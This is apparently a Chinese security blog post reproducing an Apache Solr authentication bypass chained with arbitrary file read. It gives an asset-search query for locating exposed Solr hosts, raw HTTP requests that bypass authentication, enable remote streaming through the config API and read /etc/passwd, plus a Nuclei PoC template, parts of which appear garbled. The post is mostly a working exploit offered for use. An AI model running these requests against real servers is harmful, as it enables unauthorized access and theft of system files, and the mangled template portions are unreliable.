ApacheSolr是一个开源的企业级搜索平台,构建在 Apache Lucene 之上,提供了强大的全文搜索、实时索引和分布式搜索能力。该软件存在认证绕过漏洞,配合之前爆出的任意文件读取漏洞可实现任意文件读取
漏洞信息
混子Hacker
01
资产测绘
app="APACHE-Solr"
混子Hacker
02
漏洞复现
GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
Host:
SolrAuth: test
利用绕过身份验证,获取core名称
POST /solr/core名称/config:/admin/info/key HTTP/1.1
Host:
SolrAuth: test
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
修改core配置
GET /solr/core名称/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
Host:
SolrAuth: test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
读取文件
混子Hacker
03
Nuclei Poc
id: solr-unauth-fileread
info:
name: solr认证绕过导致任意文件读取漏洞
author: Thomas
severity: critical
reference: none
metadata:
app="APACHE-Solr" :
tags: solr, fileread
requests:
raw:
|-
GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 :
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
gzip, deflate :
|
POST /solr/{{core}}/config:/admin/info/key HTTP/1.1
Host: {{Hostname}}
application/json :
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 :
{"requestDispatcher.requestParsers.enableRemoteStreaming":true}} :
|
GET /solr/{{core}}/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
gzip, deflate :
zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 :
Connection: close
extractors:
type: regex
internal: true
name: core
group: 1
regex:
'"name":"(.*?)"'
and :
matchers:
type: status
status:
200
type: regex
regex:
"root:.*:0:0:"
<<< END >>>
原创文章|转载请附上原文出处链接
更多漏洞|关注作者查看
作者|混子Hacker
原文始发于微信公众号(混子Hacker):【漏洞复现】Apache-Solr身份认证绕过和任意文件读取
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论